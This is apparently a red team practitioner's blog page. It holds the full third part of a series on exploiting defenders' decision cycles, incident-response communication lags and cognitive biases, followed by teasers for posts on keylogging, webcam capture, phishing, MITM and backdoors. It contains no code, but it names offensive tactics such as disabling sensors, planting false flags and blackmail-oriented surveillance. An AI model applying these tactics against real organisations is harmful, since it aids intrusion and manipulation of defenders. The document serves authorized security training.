Common Ground Part 3: Execution and the People Factor

This is part three of a blog series titled: Common Ground. In Part One, I discussed the background and evolution of red teaming. I dove deep into how it applies to the information security industry and some limitations that are faced on engagements. In Part Two, I discussed various components of the planning phase to help ensure a valuable and mature exercise. In this part, I will discuss how a red team can execute a thorough operation. I will steer clear of the technical components of the network red team, instead focusing on the most important outcome of a red team assessment: communication improvement and bias identification. I encourage you to read my disclaimer in Part One before continuing.

Decision Cycles

If you have been through any strategy classes or military training, there is a good chance you have heard of the overused and applied concept of decision cycles. In school, I loved the numerous military strategy and history classes I took, but at the time, I too often thought the concepts were defined to the point of absurdity (and I am sure I will get some fun comments from friends now that I am writing about them here). Later in my career, when I found myself playing adversary against major industry blue teams, I fell back to some of the military strategy lessons to help achieve our objective in the wargame on their network. Throughout my first several engagements, I learned that those lessons could be applied heavily to help achieve a major goal of the assessment—improvement of process. 

Decision cycles are a set of steps taken by an entity in a repetitive manner to plan their course of action, take that action, learn from the results, and implement new decisions. In theory, they are foundational to everything we do day-to-day, even if you do not realize or formally follow a decision cycle. Formal examples:

  • Plan-Do-Check-Act – Heavily used in quality assurance
  • Observe-Orient-Decide-Act (OODA)- Used by the US Military. A diagram of this process as formulated by Boyd is below
  • Observation–Hypothesis–Experiment–Evaluation (Scientific Method) – Used to evaluate hypothesis and make adjustments in scientific research

John Boyd, the person who formulated and studied the OODA cycle also theorized about how these loops could be used to defeat an enemy. He believed that if you could work through your decision cycles faster than your adversary you would be able to react to events quicker and, therefore, gain a strategic advantage. In this concept, he covered numerous aspects that affected the speed of decision cycles and methods of intentionally slowing your adversaries’ decision cycles. At each step in the cycle, many factors impact the decision maker and affected the outcome.



Here are the phases broken down:

  • Observation: During the observe phase, the entity uses the unfolding circumstances combined with current interactions within the environment to formulate their perception of what is happening. They combine this info with outside information (enrichment data) to form the basis of their understanding.
  • Orient: During this phase, the decision maker takes their perception of the situation, and aligns their thoughts with the actions that are occurring. They utilize the culture of their organization, knowledge of past events, and the constant flux of information to begin to shape a potential decision.
  • Decide: This simple phase takes the information from the previous two phases and makes the decision on the best course of action.
  • Act: Having made the decision, the entity now executes that decision and utilizes any outcome as part of a feedback loop going back into the observe phase to mold a changing environment.

Affecting Decisions In Each Phase – Case Study

With knowledge of this process and the goal of intentionally slowing down the blue team’s decision cycles, the red team can plot certain actions to not only identify technical vulnerability, but also human vulnerability. Below are some possible ways that the red team can alter the decision cycles of the blue team. They are small examples that can be expanded upon greatly to build a strategic playbook of sorts.

  • Observation
    • Limit the amount of information the decision maker can gain from the environment or overwhelm the decision maker with too much competing information.
    • Plant false flags pointing to multiple adversaries to produce offensive counter-information and force the decision maker to rely on outside information that is actually not relevant.
    • Disable network security sensors to prevent them from gaining a perception in the environment.
  • Orient
    • Identify known personalities in the decision making process and leverage personality flaws or biases to hamper a proper decision.
    • Prevent the thorough analysis of information by shifting or changing TTPs frequently.
    • Identify cultural traditions and norms and utilize them as part of your attack path (it is normal for people to log in after hours, so log in after hours).
    • Study past breaches in the environment and identify errors that you can piggyback off of.
  • Decide
    • Adapt your TTPs in a rapid fashion so that they consider changing their decision numerous times; therefore, introducing a delay.
  • Act
    • Recognize that a decision has been executed and orient yourself prior to allow their feedback loop to occur.
    • Nullify their actions in a rapid fashion so they feel the need to repeat the same actions.

By recognizing the “people aspect” of an engagement, the red team is better equipped to use technical expertise in the environment to operate without valid response and, therefore, achieve success. Understanding strategy and psychology of influence helps to hammer home the impact of the blue team’s lack of operational exercise of their incident response plans.

Incident Response Cycle

While not technically a decision cycle, the incident response process or “killchain” is a cyclical process that is industry recognized and applied. This process is heavily defined in NIST 800-61 R2 and their figure of the process is below. As a network adversary, recognizing the process your blue team opponent is operating within allows you to better predict their actions and plot their potential steps, which decreases the time required for your decision making and increases your strategic advantage.

IR Process

Outside of the technical response that will be conducted as part of the exercise, there is an assumed phase within each step of the process. This assumed phase is the communications, command, and control (C3) that occurs within the organization being exercised. Within the C3, there can be significant time delays introduced that prevent a rapid or thorough response, essentially crippling the technical responders. The red team can exercise this process during an engagement by including the communication plans in the exercise and ensuring that the blue team conducts a complete response as they would against a real adversary. Common issues we see with C3 in an organization:

  • Delegation – Certain decisions must be delegated down to prevent time lag.
  • Leadership Lag – Not all non-technical leaders will understand how to respond. They must have practice to react quicker during a real breach.
  • Out-of-Band C2 – During response efforts, the use of a compromised network will allow the adversary to instantly be inside your decision cycles by witnessing it in real-time. The adversary will also be able to apply deception or disruption operations.

Another aspect of the process is the ability for adversaries and red teams to increase the lag time by attacking targets that intentionally increase the amount of communication required on behalf of network defenders. By laterally spreading through multiple organizations, subsidiaries, international components, or business lines, the red team is able to force collaboration and response across organizational or international lines, which is inherently slow, if it happens at all. Testing this multinational communication  also forces decision makers to consider incorporating international and privacy laws into their response plans.

With the red team targeting the human factor as well as the technical, and working through these issues in advance, the organization will dramatically decrease the disparity between their mean time to detection and their mean time to response.


When analyzing decision cycles and the incident response processes, one must recognize that bias plays a big factor in sufficiently defending an organization at all levels. As a red team, recognizing the various biases that could be used as weapons against an organization can be extremely useful. As a blue team member, you must recognize that these exist and practice working through them.

  • Confirmation Bias – look for information that supports your existing beliefs. Example: “I believe I have excellent egress controls so I will look for information that shows I am successfully blocking C2.”
  • Anchoring Bias – Jumping to conclusions or basing conclusions on information gathered early in investigation. Example: “We have the adversary contained, the email gateway shows only 1 user was phished.”
  • Automation Bias – The overreliance on automated systems which skew your available information. Example: “The threat intelligence tool does not report any adversaries, so how can there be one?”
  • Framing Effect – Drawing different conclusions on information depending on presentation. Example: “Information is presented to the CIO by the CISO in a positive, hopeful light (things are under control) because he does not want to be fired even though the breach is uncontrolled.”
  • Information Bias – Tendency to seek more information even though it is not needed for decisions. This is extremely common in new decision makers. Example: “The new CISO wants to continue seeking external info on the threat and consulting with external teams before deciding on the course of action in response.”
  • Zero Risk Bias – Preference in reducing a small risk to zero over the greater reduction in a much larger risk profile. Example: “Although the organization has invested 100K in phishing prevention, I want to continue making sure that is entirely not possible even though I have user home directories completely unsecured.”

If these biases impact your organization during a red team assessment, it can be identified through a rigorous debriefing process where both teams share journals of activity for time comparisons. This will allow for improvement and recognition of the risk of bias in decision making.

For more information on cognitive bias and the impact on decision making, check out this article on MindTools. Also, this Harvard Business Review article is awesome: Why Good Leaders Make Bad Decisions.


As shown throughout this post, one major motivation for conducting a red team assessment is working through a full response and breach scenario to practice making decisions. Blue teams should recognize that their personalities are in-scope and red teams should learn to focus on utilizing the psychological aspects of conflict to their advantage in addition to the technical vulnerabilities they uncover. Rigorous debriefing and team work can benefit all stakeholders involved, allowing for a fluid and rapid response during a real breach scenario.

Blog Series Wrap Up

That wraps up my brain dump and blog series about red teaming. While these posts were not overly technical in nature, I hope this series serves people well and encourages a proactive discussion on how analytical techniques can help organizations improve, both organizationally and technically. There might be another post or two like this down the line if they were helpful, particularly on debriefing. I will state it again, any form of this analysis being conducted to better the organization is useful even if it does not apply to a strict definition. As the terms have evolved, there are subsets of study and room for additional applications in the industry.

Finally, since I understand the relationship between red and blue teams can be contentious, I offer this final advice:

To the red team: you are providing a service to your customer— the blue team. You should be as familiar with defensive techniques as you are offensive. Prepare well, conduct a thorough assessment, and do not get wrapped up in politics.

To the blue team: the red team is on the same team. While they may cause you more work, it is much more fun practicing response in your real environment than in a training lab. Share info and teach the red team so that they can better train you!

Common Ground: Planning is Key

This is part two of a blog series titled: Common Ground. In part one, I discussed the backgrounds and evolution of red teaming, diving deep into how it applies to the information security industry and some limitations engagements face. In this part, I will discuss common components of red team planning and how they play into execution. There are many publications, documents, articles, and books focused on the structure of red teams, but I’m going to cover facets integral to engagement planning that I don’t see discussed enough.

Planning can be completed formally or informally. Organizations often benefit by being heavily involved in the planning process; however, sometimes the task is delegated to the red team with the organization giving final approvals. Finally, while not every single component here may be thoroughly planned in every engagement, I do not believe that it lessens the validity of the engagement as long as execution strikes back to the central theme or motivation for testing in the first place.  I encourage you to read my disclaimer in my previous piece before continuing.

References that are useful for the generic planning process of network red team engagements:

Continue reading

Common Ground Part 1: Red Team History & Overview

Over the past ten years, red teaming has grown in popularity and has been adopted across different industries as a mature method of assessing an organization’s ability to handle challenges. With its widespread adoption, the term “red team” has come to mean different things to different people depending on their professional background. This is part one of a three-part blog series where I will break down and inspect red teaming. In this section, I will address what I believe red teaming is, how it applies to the infosec industry, how it is different from other technical assessments, and the realistic limitations on these types of engagements. In part two, I will discuss some topics important to planning a red team engagement, including organizational fit, threat models, training objectives, and assessment “events.” Finally, in part three,  I will discuss red team execution, focusing on the human and strategic factors instead of technical aspects. That post will cover how network red teams supplement their technical testing by identifying human and procedural weaknesses, such as bias and process deficiencies inside of the targets incident response cycle ranging from the technical responder up through the CIO.

Many thanks to my current team in ATD and those in the industry who continue to share in this discussion with me. I learn new stuff from all of you every day and I love that as a red team community, we want to continue honing our tradecraft.

Disclaimer: Before going too much further, it is obvious that this is a contentious topic. My view points are derived from experience in the military, planning and executing operations followed by several years in the commercial industry helping to build and train industry-leading red teams; however, I am constantly  learning and by no means think I have all of the answers. If you disagree with any points I discuss in these posts, I respect your viewpoint and experience behind it, but we might have to agree to disagree. In the end, the importance of red teaming isn’t about a single or even a group’s philosophy; rather it’s about best preparing organizations to handle challenges as they arise. If your methodology suits your organization’s needs, I applaud it!

Continue reading

Creepy User-Centric Post-Exploitation

I love seeing red and blue teams square off during an engagement. It works best if both sides avoid selfish desires and focus on the task at hand; improvement and training is the ultimate goal.  A key component of the offensive aspect of this feud is the ability for the red team to conduct adversarial actions against users to gather data and accomplish objectives. Throughout every engagement, the red team has to be constantly aware of user behavior — tracking their movements, exploiting their weaknesses, mapping relationships, and analyzing yielded data to better accomplish the adversarial mission. By collecting, analyzing, and processing user-based intelligence, the red team is armed and prepared to succeed in accomplishing training objectives while also carrying out realistic adversarial actions.

Keylogging, clipboard monitoring, and screenshots provide easy examples of user-centric post-exploitation actions that are both super useful for the red team and borderline creepy at times. These are also some of my favorite techniques before and after escalation of obtaining valuable intel. With strictly the data from these actions our team has been able to obtain passwords to critical ICS nodes, get screenshots of admins accessing sensitive data repositories (i.e. mainframes for healthcare, finance, etc), retrieve router configs copied to the clipboard, and many many more awesome things. In short, these actions are crucial for success in a large-scale and long-term engagement.

One key thing about being in a red team: you must avoid limiting yourself to certain actions or tools out of habit. You have to ditch the myopic view and broaden your horizon. When I run out of ideas, I look to the real adversaries to see what they are doing. Several sets of threat actors (i.e. Flame, Duqu) have been particularly inspiring and driven us to “up our game” when it comes to utilizing intelligence gathering against users. These actors all appear to have a wide array of modular capabilities in their tools that allow them to accomplish required actions. For our team, Empire  and Cobalt Strike have the majority of capabilities we need for data collection; however, every so often we want to dig deeper and demonstrate additional actions that an adversary could carry out. In a recent engagement, those specific actions were webcam capture and microphone audio recording.

You might ask “… REALLY? Why do I need audio/video from a target?” If you have asked that, you might consider brainstorming about all the ways an adversary gathers intel from a system or why they gather it. For example’s sake, audio capture makes a lot of sense for a military command center or political office. In a separate case, video capture of a high ranking C-level executive in their private office might result in good blackmail material for manipulation or access to sensitive discussions.

Before I go too far, I would be remiss if I didn’t mention that the Metasploit Project has post-exploitation capabilities to carry out these actions. Due to a couple of fail cases (which all tools have depending on the situation), I took it upon myself to look for or develop alternatives… Plus, I <3 Offensive/Defensive PowerShell.
Continue reading

Empire & Tool Diversity: Integration is Key

Since the release of PowerShell Empire at BSidesLV 2015 by Will Schroeder (@harmj0y) and myself, the project has taken off. I could not be more proud of the community of contributors and users that have rallied together to help us maintain and continue building Empire. Since the project’s release, Matt Nelson (@enigma0x3) has joined our team and has taken charge of handling the various issues that arise from time to time (many thanks to him for this uphill battle). Also, Matt Graeber (@mattifestation) is now working with us and will likely have a lot of backstage influence on the continued development AND detection/mitigation of Empire. To think of it, I have been mostly hands-off with Empire development recently… Will and Matt work at speeds that I can only envy and their vision for the tool is fantastic. This post is continuing an ongoing blog series that the Empire team is doing and will cover integration with existing toolsets, namely Metasploit and Cobalt Strike. The remainder of the series with some background and an ongoing list of series posts is kept here.

Early on we recognized that we didn’t want Empire to be an “all-purpose” agent, so we wanted to ensure that it integrated well with existing operational tools and platforms. We firmly believe that there is no single universally perfect tool- every situation demands a different perspective and each blue team likely has different training objectives (red teams take note, they are your “customer”). With unity in mind, we wanted to primarily focus our integration on easily passing sessions back and forth between Empire, Metasploit, and Cobalt Strike.

Continue reading

Remote Weaponization of WSUS MITM

Network attacks (WPAD Injection, HTTP/WSUS MITM, SMB Relay etc.) are a very useful attack vector for adversaries trying to laterally spread, gather credentials or escalate privileges in a semi-targeted manner. This vector is used by known adversaries attempting to penetrate deep into networks, and numerous threat/malware reports have cited tools with functionality that allows attackers to perform these attacks in a remote fashion. Duqu 2.0 is a great example of where such attacks can be found in the wild and the reports of this actor make a great case study.

I became even more familiar with the techniques thanks to demos and stories from Jeff Dimmock (@bluscreenofjeff) and Andy Robbins (@_wald0), with whom I work everyday. After learning Responder, I toyed with broader capabilities such as MITMf, which combines a variety of tools into a weaponized platform for easy integration into your methodology. For those unfamiliar with these tools, please check out the following links:

In the case of the evil and wily APT actors in referenced Duqu 2.0 report, the actors used a module built specifically for their toolkit and did not require the use of public tools or external scripts. Unfortunately, for a long period of time, public MiTM/relay attack tools still required you to physically be on a local LAN (that I’m aware of anyways… I welcome your comments). In early 2015, Kevin Robertson (@kevin_robertson) released Inveigh, a PowerShell network attack tool that uses raw sockets to implement a limited subset of techniques including LLMNR spoofing, MDNS spoofing, and SMB relay. Inveigh opens the door for many interesting attack chains and allows us to better emulate threats using these vectors in a remote fashion. If you care why we emulate threats, go elsewhere… Raphael Mudge has some really great ideas and thoughts on the topic.

Continue reading

Derivative Local Admin


User hunting is the process of tracking down where users are logged in or have a session in the network. By locating their login or session, you might be able to gain access to that Machine, privesc (if required), and operate in the context of the new user. This is obviously most helpful with elevated user accounts.

Harmj0y has talked in-depth about user hunting in multiple blog posts and at several different conferences… you might wonder, why another post? While many people have paid attention and are plenty capable of running PowerView’s “Invoke-UserHunter” function, they might not fully understand how it works below the hood. This can prevent them from being successful in “Austere” networks (you know, where things get weird), or very very large enterprise networks. Also, as people begin to lock down and follow best practice in Windows Domains, I have noticed a new trend in how I am gaining access to elevated user accounts.

For some of the posts and presentations on user hunting, check out:

Continue reading

Domain Enumeration w/Netonly

It is common on an internal engagement for my team to be provided network access for our vulnerability scanning and penetration testing activities. One of the first things we always like to do when gaining initial access to a host is utilize the target to conduct domain enumeration actions with hopes of laterally spreading to additional systems. We have traditionally done this enumeration from a compromised host to ensure we were running in the context of a domain user. Usually we will use the PowerShell functionality in Beacon or Meterpreter to run PowerView. Harmj0y has a usage guide on this functionality and tradecraft is far beyond the scope of this post.

Recently, with the help of Chris Truncer, I stumbled upon a method to use PowerView to enumerate the target domain directly from our team’s Windows assessment VMs instead of through a compromised host. The trick I learned is quite old and has been described on pentester blogs previously BUT not within the context of using it for PowerView enumeration.

Continue reading

PowerPick – A ClickOnce Adjunct

Phishing has always been a luck of the draw situation for me on engagements. Many people say that phishing is the easiest step and while I typically agree (since you only need one successful payload to run), I find it is one of the most common areas to tip off incident responders that there is a malicious campaign occurring. On one recent engagement, phishing was quite a pain point for me as their users were very well trained and the layers of defense that my email had to go through were mind blowing. It was not long before I received notifications from spamhaus and watched responders diving in on my initial endpoints.

Thanks to the NetSPI team, I just recently discovered my new favorite phishing technique that I wish I had used in that tough case! While playing with it, I made a slight modification which hopefully will provide a demo of one of many methods of modifying this technique.

Continue reading

Varying Heuristics in a Network with PowerBreach

Since the dawn of hacking, there have been lots of techniques released to backdoor Windows systems. From the wild wild west of the registry to the Windows Task scheduler, hackers love to find creative ways to maintain access to their conquests. While backdoors do not have to be related to malicious code, such as the case of an maliciously added user, often times a backdoor is thought to be synonymous with other sub-forms of malware. It just isn’t true… a backdoor can be much more interesting than a RAT hidden in the Run key. The Shmoocon 2013 talk by Jake Williams and Mark Baggett really hit home for me. The blog about this talk can be found here.

Taking a step back, lets pull straight from the most authoritative source on the internet… Wikipedia:

A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing unauthorized remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected

Across the spectrum of assessments I go on, I find the concept to be not quite that simple. Backdoors possess multiple qualities that are worth breaking down to understand the decision points you have available to you as an operator. Further, there is no worse feeling than having your chosen backdoor be your single point of failure.

Continue reading